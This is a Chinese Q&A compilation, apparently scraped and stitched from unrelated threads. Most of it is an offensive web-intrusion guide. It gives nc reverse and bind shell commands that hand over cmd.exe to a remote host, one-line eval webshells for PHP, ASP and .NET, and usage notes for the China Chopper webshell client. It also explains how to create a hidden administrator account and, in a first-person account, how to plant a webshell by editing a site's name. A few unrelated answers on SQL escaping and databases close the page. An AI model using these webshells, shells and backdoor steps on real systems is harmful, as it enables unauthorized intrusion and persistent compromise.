⑴ web滲透是什麼
Web滲透測試分為白盒測試和黑盒測試,白盒測試是指目標網站的源碼等信息的情況下對其滲透,相當於代碼分析審計。而黑盒測試則是在對該網站系統信息不知情的情況下滲透,以下所說的Web滲透就是黑盒滲透。
Web滲透分為以下幾個步驟,信息收集,漏洞掃描,漏洞利用,提權,內網滲透,留後門,清理痕跡。一般的滲透思路就是看是否有注入漏洞,然後注入得到後台管理員賬號密碼,登錄後台,上傳小馬,再通過小馬上傳大馬,提權,內網轉發,進行內網滲透,掃描內網c段存活主機及開放埠,看其主機有無可利用漏洞(nessus)埠(nmap)對應服務及可能存在的漏洞,對其利用(msf)拿下內網,留下後門,清理痕跡。或者看是否有上傳文件的地方,上傳一句話木馬,再用菜刀鏈接,拿到資料庫並可執行cmd命令,可繼續上大馬.........思路很多,很多時候成不成功可能就是一個思路的問題,技術可以不高,思路一定得騷。
信息收集
信息收集是整個流程的重中之重,前期信息收集的越多,Web滲透的成功率就越高。
DNS域名信息:通過url獲取其真實ip,子域名(Layer子域名爆破機),旁站(K8旁站,御劍1.5),c段,網站負責人及其信息(whois查詢)
整站信息:伺服器操作系統、伺服器類型及版本(Apache/Nginx/Tomcat/IIS)、資料庫類型(Mysql/Oracle/Accees/Mqlserver)、腳本類型(php/jsp/asp/aspx)、CMS類型;
網站常見搭配為:
ASP和ASPX:ACCESS、SQLServer
PHP:MySQL、PostgreSQL
JSP:Oracle、MySQL
敏感目錄信息(御劍,dirbust)
開放埠信息(nmp)
漏洞掃描
利用AWVS,AppScan,OWASP-ZAP,等可對網站進行網站漏洞的初步掃描,看其是否有可利用漏洞。
常見漏洞:
SQL注入
XSS跨站腳本
CSRF跨站請求偽造
XXE(XML外部實體注入)漏洞
SSRF(服務端請求偽造)漏洞
文件包含漏洞
文件上傳漏洞
文件解析漏洞
遠程代碼執行漏洞
CORS跨域資源共享漏洞
越權訪問漏洞
目錄遍歷漏洞和任意文件讀取/下載漏洞
漏洞利用
用工具也好什麼也好對相應漏洞進行利用
如:
Sql注入(sqlmap)
XSS(BEEF)
後台密碼爆破(burp)
埠爆破(hydra)
提權
獲得shell之後我們許可權可能很低,因此要對自己提權,可以根據伺服器版本對應的exp進行提權,對於Windows系統也可看其補丁對應漏洞的exp進行提權
內網滲透
首先進行埠轉發可用nc
nc使用方法:
反向連接
在公網主機上進行監聽:
nc-lvp 4444
在內網主機上執行:
nc-e cmd.exe 公網主機ip4444
成功之後即可得到一個內網主機shell
正向連接
遠程主機上執行:
nc-l -p 4444 -t -e cmd.exe
本地主機上執行:
nc-vv 遠程主機ip4444
成功後,本地主機即可遠程主機的一個shell
然後就是對內網進行滲透了,可以用主機漏洞掃描工具(nessus,x-scan等)進行掃描看是否有可用漏洞,可用msf進行利用,或者用nmap掃描存活主機及開放埠,可用hydra進行埠爆破或者用msf對埠對應漏洞得到shell拿下內網留後門
留後門
對於網站上傳一句話木馬,留下後門
對於windows用戶可用hideadmin創建一個超級隱藏賬戶
手工:
netuser test$ 123456 /add
netlocalgroup administrators test$ /add
這樣的話在cmd命令中看不到,但在控制面板可以看到,還需要改注冊表才能實現控製版面也看不到,太過麻煩,不多贅述,所以還是用工具省心省力。
⑵ 中國菜刀的功能介紹:
只要支持動態腳本的網站,都可以用中國菜刀來進行管理!主要功能有:文件管理,虛擬終端,資料庫管理。
UINCODE方式編譯,支持多國語言輸入顯示。
一、EVAL客戶端部分
1)要了解的
服務端只需要簡單的一行代碼,即可用此程序實現常用的管理功能。
支持的服務端腳本:PHP, ASP,NET。
在服務端運行的代碼如下:
PHP: <?php @eval($_POST['pass']);?>
ASP: <%eval request(pass)%>
.NET: <%@ Page Language=Jscript%><%eval(Request.Item[pass],unsafe);%>
(注意: .NET要單獨一個文件或此文件也是Jscript語言)
2)怎麼用
在主視圖中右鍵/添加,在彈出的對話框中輸入服務端地址,連接的密碼(請注意上例中的pass字串),選擇正確的腳本類型和語言編碼,保存後即可使用文件管理,虛擬終端,資料庫管理三大塊功能。要是其它都沒錯誤,那麼可能就是你把語言編碼選錯了。
1. 文件管理:[特色]緩存下載目錄,並支持離線查看緩存目錄;
2.虛擬終端:[特色]人性化的設計,操作方便;(輸入HELP查看更多用法)
3.資料庫管理:[特色]圖形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS
以入支持ADO方式連接的資料庫。
(各種腳本條件下的資料庫連接方法請點擊資料庫管理界面左上角處的配置按鈕查看)
注意:由於伺服器的安全設置,某些功能可能不能正常使用。
3) 關於配置信息怎麼填?
A) 資料庫方面:
PHP腳本:
<T>類型</T> 類型可為MYSQL,MSSQL,ORACLE,INFOMIX中的一種
<H>主機地址<H> 主機地址可為機器名或IP地址,如localhost
<U>資料庫用戶</U> 連接資料庫的用戶名,如root
<P>資料庫密碼</P> 連接資料庫的密碼,如123455
ASP和.NET腳本:
<T>類型</T> 類型只能填ADO
<C>ADO配置信息</C>
ADO連接各種資料庫的方式不一樣。如MSSQL的配置信息為
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456
B) 其它方面:
添加額外附加提交的數據:應付這種情況:if ($_POST['action']=='test'){@eval($_POST['pass']);}
<O>action=test</O>
提交功能前先POST額外的數據包:會話期間只提交一次。
<DATA>uid=user1&pwd=123456</DATA>
二、網站蜘蛛
織出一張網站的目錄結構。
下載的列表文件存在桌面,右鍵菜單/載入URL列表即可以根據地址得到目錄結構。
三、定時提醒
當鬧鍾事使吧, 周期:每月/每周/每日/只一次。
四、快速啟動
一些常用的快捷方式放在這里,可以指定用戶身份運行程序。這部分數據是以加密存儲的。
五、瀏覽器
地址欄輸入HELP,更多精彩後續加入。
六、其它部分
等待加入。
附帶工具
update.exe是wsc.exe的資料庫wscdb遷移到菜刀的一個小工具。
把wscdb文件整到當前目錄,運行update.exe得到新的資料庫文件cai.mdb
把菜刀的資料庫db.mdb替換掉即可。
⑶ 上傳一句話木馬後,資料庫備份成功,之後用中國菜刀連接成功,想傳大馬,怎麼弄。
菜刀裡面有上傳功能的 ,直接把你的大馬上傳就可以了
⑷ 一句話木馬怎麼插和我插了一句話木馬之後那個打開網址然後上傳代碼的網址是多少那些教程里沒有說那個地址
一句話木馬插入方法:第一種:先判斷資料庫是asp或其他格式,若為asp格式,可通過留言本向資料庫插入一句話代碼,插入後,用中國菜刀連接留言本資料庫地址(資料庫地址可以通過暴庫爆出路徑,暴不出路徑,就用工具強行掃描,看是否能掃到資料庫地址)就得到webshell了。第二種:進入網站後台,然後修改網站名,把網站名修改成一句話木馬代碼,記住,要閉合插入一句話,即
"%><%evalrequest("這里換成你喜歡設的密碼"%><%s="'閉合的一句話木馬代碼
<%evalrequest("這里換成你喜歡設的密碼"%>'未閉合的一句話木馬代碼
有一次,我進了一個網站後台,修改網站名時,沒有閉合插入一句話木馬代碼,致使後台出現了403錯誤,無法打開,白浪費了一個網站。閉合插入並保存後,用中國菜刀連接網站配置文件(配置文件路徑可以通過插入未閉合的一句話木馬代碼,不保存,點擊後台別的位置,會出現錯誤提示,下面的路徑就是網站配置文件的路徑),因為網站名等信息在網站的配置文件中,就要連接配置文件,成功後,你就得到了網站webshell了。
總之,我是這樣拿站的,希望這些方法對你有用。
⑸ 不能寫入資料庫
$sql="INSERT INTO message (title,name,content) VALUES ('".$tltle."','".$name."','".$content."')";
這句最好在變數兩邊加上addslashes,這樣可以把一些特殊字元進行轉義,不然你的數據不能正常入庫
$sql="INSERT INTO message (title,name,content) VALUES ('".addslashes($tltle)."','".addslashes($name)."','".addslashes($content)."')";
⑹ JSP資料庫怎麼在菜刀一句話裡面連接啊我想看裡面的數據用戶表和密碼表
你是需要在一個新的頁面看到你的用戶表和密碼表呢
還是在本頁面上看到你的想要的數據
如果是新的頁面就只需要用<a href=" 來個servlet的連接地址">需要連接的字</a>
然後在servlet裡面返回你所需要的數據就好了
⑺ 前台 後台 伺服器 操作系統 資料庫之間的關系
首先需要重組下順序:前台,後台,資料庫|操作系統,伺服器 這樣以「|」為分隔符將其分為兩部分比較好理解。
前台:就是面向用戶的,用戶利用這個「前台」來查詢需要的信息,他們只有「讀」許可權。就是說在前台裡面他們能做的只是「看」,而不能改、刪、 加等操作;
後台:就是面向管理員的,在「後台」裡面管理員擁有所有許可權,他有「寫」許可權,比如,添加信息(前台用戶所能查看到的東西,就是你這個管理員去加的,要不他們查什麼呢?呵呵),刪除信息,修改信息,還有其他一些管理許可權等,這個要在你的系統製作的時候包括了,當然,他也有「讀」許可權,這個是肯定的了。
資料庫:就是保存你的這些所有信息的一個容器,你添加、修改的信息都被放在這裡面,用戶要查詢的信息也是從這個裡面來調用的。
至於操作系統跟伺服器,那就是你的這個程序運行的一個環境了。舉個簡單的例子,比如:你要切菜,那麼,菜刀就相當於操作系統,菜板就是伺服器了,這就是一個環境。
補充回答:
1。是的,資料庫是放在伺服器上的。
2。操作系統不分前台和伺服器,甚至這種說法根本就沒有什麼意義
操作系統就是我們所說的,winxp、win2000這個樣子;伺服器其實就是一台電腦,跟普通的電腦沒有差別,只是它的配置可能稍好一點,就這么理解就行了。
假如說,現在你這個物流查詢系統已經做好了,那麼你就需要把它放在伺服器上了,而這個伺服器(網站空間)需要你去買,而買下來以後,你就等於同時擁有的伺服器(網站空間)跟操作系統,因為你買伺服器(網站空間)的時候已經裝好了操作系統的,所以這個你就不需要去操心了。
而你說的前台、後台、資料庫,是屬於你這個物流查詢系統的,它不屬於操作系統,也不屬於伺服器,而只是放在了伺服器上,利用操作系統這個平台去運行它。這樣應該清楚了吧?
多看一些這方面的資料,慢慢就會理解的,沒有你想像的那麼復雜。
同時,嚴重鄙視一下「來自建站之家」,你的行為讓我感到很不舒服!!
⑻ 用java做一個系統,使用人次超過500人,請問哪位高手能告訴我該用哪個資料庫,及用這個資料庫的優勢。
Microsoft SQL Server 2000 能提供超大型系統所需的資料庫服務。大型伺服器可能有成千上萬的用戶同時連接到 SQL Server 2000 實例。SQL Server 2000 為這些環境提供了全面的保護,具有防止問題發生的安全措施,例如,可以防止多個用戶試圖同時更新相同的數據。SQL Server 2000 還在多個用戶之間有效地分配可用資源,比如內存、網路帶寬和磁碟 I/O